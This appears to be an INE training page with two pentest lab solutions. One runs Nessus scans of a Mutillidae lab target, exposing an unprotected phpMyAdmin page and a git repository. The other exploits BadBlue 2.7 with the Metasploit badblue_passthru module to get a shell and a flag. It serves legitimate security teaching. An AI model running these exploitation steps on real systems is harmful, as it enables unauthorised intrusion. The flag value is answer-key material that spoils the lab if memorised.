Nessus Lab

In this lab you will use Nessus to scan and perform vulnerability analysis of a target
machine running an instance of Mutillidae web application.

This exercise will help you understand how to perform vulnerability scanning using Nessus

Lab Environment
In this lab environment, the user is going to get access to a Kali GUI instance. An instance of
the Mutillidae web application can be accessed using the tools installed on Kali
at http://demo.ine.local.

Objective: Perform vulnerability scan on the target machine using Nessus.

Relevant Information:
 Username: admin

 Password: adminpasswd

Tools
The best tools for this lab are:

 Nessus

 A web browser
Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the
solutions before actually trying the concepts and techniques you studied in the
course, will dramatically reduce the benefits of a hands-on lab!

Solution

Nessus
ACTIVITY STATUS: UNSTARTED

Report an issue
Overview

Tasks

Solutions

Solution
Step 1: Open the lab link to access the Kali GUI instance.

Step 2: Launch the browser and open Nessus dashboard.

Nessus dashboard can be accessed by visiting the following URL:

URL:

https://localhost:8834/
Note: If you visit http://localhost:8834/ instead of HTTPS, then you would get the
following page:

Once Nessus dashboard opens up, enter the credentials provided in the challenge
description:

Username: admin Password: adminpasswd

Upon successful authentication, you would see the following screen:

Step 3: Scan the target machine at demo.ine.local using Nessus.

In the text area labeled as Targets, enter the target we wish to analyze using Nessus, that
is, demo.ine.local:

Once the target has been entered, you should see the following screen:
This is the result of the Host Discovery scan performed by Nessus. It shows the DNS name
as well as the IP address of the target machine.

Select the only host listed and click on the Run Scan button:

This would start a Basic Network Scan by default:

Notice that we can see the name, start time and the status of the scan on the right.

Once the scan is finished, you would notice the following screen:

You can see the scan status (Completed), scan duration as well as the vulnerabilities
discovered during this scan.
In this particular scan, 2 medium severity vulnerabilities were discovered. To get more
details about the vulnerabilities, click on the horizontal colored bar containing the
vulnerabilities of different severity and their respective counts.

That would open up the following page:

Here you can notice the different vulnerabilities discovered by this scan. To get more
details about a specific vulnerability, simply click on the entry for it and you would be taken
to a page like this:

This page would show you the vulnerability name, it's severity, a short description, a
remediation strategy, related advisories/links.
The output section on the same page might show you the steps or the URL to exploit or
confirm the vulnerability as well:

Head back to the previous page containing all the identified vulnerabilities in the scan by
clicking on the Back to Vulnerabilities link:

Step 4: Download the vulnerabilities report for the basic network scan.

We can even export the results in the form of a report which can be submitted to your
clients after a pentest, while reporting your findings.

This can be done by clicking on the Report button on the top-right corner of the page
containing all the discovered vulnerabilities for the scan under consideration:
You will get the following options to generate a report:

We will go with the defaults for now (a PDF report containing the complete list of
vulnerabilities by host) and click on the Generate Report button.
Once the report is downloaded, it should look something like this:

Step 5: Performing a custom scan using Nessus.

Now that we have performed a basic scan using Nessus, let's perform a custom scan.

The scan we will be performing would require some configuration from our end, but that
would be worthy at the end since we would control the different parameters of the scan
instead of going with the default available templates.

So to create a custom scan, let's visit the My Scans tab located in the left pane:
Before we create a custom scan, let's see the results of another scan that's shown in bold.

Information: When you start Nessus, it performs 2 basic scans by default. For one of the
scans, we already saw the results. The results for the second scan were not yet explored.
That's why they are still in bold, as in they are unread yet!

Let's check these results as well:

As you can see in the above image, it's a simple host discovery scan which took only few
seconds to conclude.

Now let's get back to the route we were on and create a new scan:

Once you are back on the My Scans screen, click on the New Scan button just below the
navbar:
For the sake of this lab, since we have Mutillidae running on the target machine, the
obvious scan template should be Web Application Tests. But instead of going with this
pre-available template, we will create a custom vulnerability scanning template using
the Advanced Scan template.

Select the Advanced Scan template and configure its settings:

Fill in a suitable name and description for the template and specify the target you wish to
scan. For this lab, the target would be demo.ine.local.

Next, we will configure the DISCOVERY -> Host Discovery settings:

We will uncheck the first option (which would test our local host for vulnerability scanning)
and we will check the second option, (which would make our scans more faster by trading-
off accuracy).

Going with these options should be okay for our simple scenario and the options you might
require would depend on the target/scenario you have. For instance, while scanning the
local machine for any vulnerabilities, you would want to keep the first option checked. And
if you wish to have reliability and reduce the false positives in your scans, then second
option must be checked as well!

Next, we will configure the DISCOVERY -> Port Scanning settings:

Let's check the TCP option in the Network Port Scanners section in order to perform a
more accurate scan:
Next, we will configure the ASSESSMENT -> General settings:
Let's check the Perform thorough tests (may disrupt your network or impact
scan speed) option:

Next, we will configure the ASSESSMENT -> ** Web Applications** settings:

Toggle the Scan web applications option:
Now, let's save the configuration we have so far. Scroll down and click on the Save button:

Now click on the My Scans on the left panel and you should see the scan you just created in
the listing:
Step 6: Running the newly configured advanced scan.

Now it's time to run the newly configured scan and see what all vulnerabilities we can get
from Nessus!

Click on the (greyed out) play button in front of the scan template we just configured,
highlighted in the following image:

Now our scan should be running:

Click on the scan entry and that should take us to the details page for this scan:
Here we can see the different vulnerabilities, categorized by their severity as well the scan
status and the timing details (when the scan got started, when it ended [if it ended], and the
time elapsed [again, it's shown once the scan ends]).

To get more details on the discovered vulnerabilities, click on the horizontal bar listing the
vulnerabilities. That should take us to the following page:

Now click on let's say the very first entry on the page, which is Phpmyadmin (Multiple
Issues) in our case.
Notice that there are 3 vulnerabilities in here and 2 of them are of HIGH severity!

Let's dig in and check the details on the first HIGH severity vulnerability among these:

This page shows more details on the selected vulnerability and the output section even lists
the URL which we can try out to verify if this vulnerability actually exists!

Let's open the specified URL http://demo.ine.local/phpmyadmin/:

Indeed we have an unprotected phpMyAdmin page! Feel free to take your time and exploit
the target machine using the unprotected phpMyAdmin page.

We will instead focus on analyzing the results of Nessus. So let's go back to the
vulnerabilities for this scan:
Let's check one more vulnerability entry:

In this case, there was a Git repository served by the Web Server!
The repository URL is shown in the Output section in the above image.

Let's verify if that's the case:

And indeed, there is an exposed git repository! And notice that this repository doesn't
seems like a normal git repository that you normally clone from websites like Github. And
Nessus's output already reported that to us.
Now let's head back to the vulnerabilities page. So Nessus found these vulnerabilities
for Mutillidae web application:

Step 7: Exporting the results of the custom scan.

Now let's export the findings in the form of an HTML page. Click on Report button just
below the navbar.
We will set HTML as the Report Format and the Detailed Vulnerabilities by Host option
for the report template, as shown in the above image. And now we can generate the report
by clicking the Generate Report button.

The report should look something like this:

If you scroll down, you would notice the Host Information as well as the
various Vulnerabilities discovered by this scan. And the remediations are also included in
the details.

Scrolling through the list, you can see the information on the different vulnerabilities
reported by the configured custom Nessus scan:
In some cases, there is an output section as well which lists the URL or the output of
importance for the listed vulnerability, as shown for Browsable Web
Directories vulnerability:
And that's how we can carry out basic as well as advanced (and custom-tailored)
vulnerability scans using Nessus!

Not Running
For the best experience, choose the region closest to you. Then, start the lab to begin.

Select the region closest to you

EU-Germany

Keyboard layout:��English (US)

Start lab

INE
AssessmentMethodologies:VulnerabilityAssessment

This course covers Vulnerability Assessment. Here in this course, you will learn about technical and
nontechnical vulnerabilities, as well as the system for tracking and researching vulnerabilities across
the cyber security community. Finding vulnerabilities and researching their criticality, importance, and
impact on the client are critical for a cyber security professional. As a pentester, finding and exploiting
vulnerabilities to further emulate adversaries is at the heart of the matter. Then reporting and relating
to the business is where the value lies.
Add

Rate this course

Volume 0%
01:10

01:10

INSTRUCTOR
Josh Mason
COURSE DURATION
2h 46m
DIFFICULTY LEVEL
COURSE FILES
INe-Assessment-Methodologies-Vulnerability-Assessment-Course-File.zip

Course Progress
Begin

Jump to category

Welcome

Introduction
Activities:1
0/1 items finished
Hide details

Course Introduction2m 14s

Start video

Vulnerability Assessment

Vulnerability Overview
Activities:2
0/2 items finished
Hide details

Vulnerabilities28m 49s
Start video

Test your knowledge: Vulnerabilities10 questions

Start quiz

Vulnerability Case Studies

Activities:1
0/1 items finished
Hide details

Case Studies39m 13s

Start video

Course Labs

Lab 1
Activities:2
0/2 items finished
Hide details

Nessus Lab6m 51s

Start video

Nessus Cyber Security

Start lab

Lab 2
Activities:2
0/2 items finished
Hide details

Vulnerability Research Lab16m 21s

Start video

Windows: Easy File Sharing Server Cyber Security

Start lab

Goodbye

Conclusion
Activities:1
0/1 items finished
Hide details

Course Conclusion2m 54s

Start video
 Name Vulnerable Easy File Sharing Server

URL https://attackdefense.com/challengedetails?cid=1944

Type Windows Exploitation: Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: ​Checking target IP address.

Note: ​The target IP address is stored in the “target” file.

Command: ​cat /root/Desktop/target

Step 2:​ Run an Nmap scan against the target IP.

Command: ​nmap -Pn 10.0.0.77

Step 3: ​We have discovered that multiple ports are open. We will run nmap again to determine
version information on port 80.

Command: ​nmap -sV -p 80 10.0.0.77

Step 4: ​We will search the exploit module for badblue 2.7 using searchsploit.

Command: ​searchsploit badblue 2.7

Step 5: ​There is a metasploit module for badblue server. We will use PassThu remote buffer
overflow metasploit module to exploit the target.

Commands:
msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS 10.0.0.77
exploit

We have successfully exploited the target vulnerable application (badblue) and received a
meterpreter shell.

Step 6: ​Searching the flag.

Command: shell
cd /
dir
type flag.txt

This reveals the flag to us.

Flag: ​70a569da306697d64fc6c19afea37d94

References

1. BadBlue 2.72b - Multiple Vulnerabilities (​https://www.exploit-db.com/exploits/4715​)

2. Metasploit Module
(​https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru​)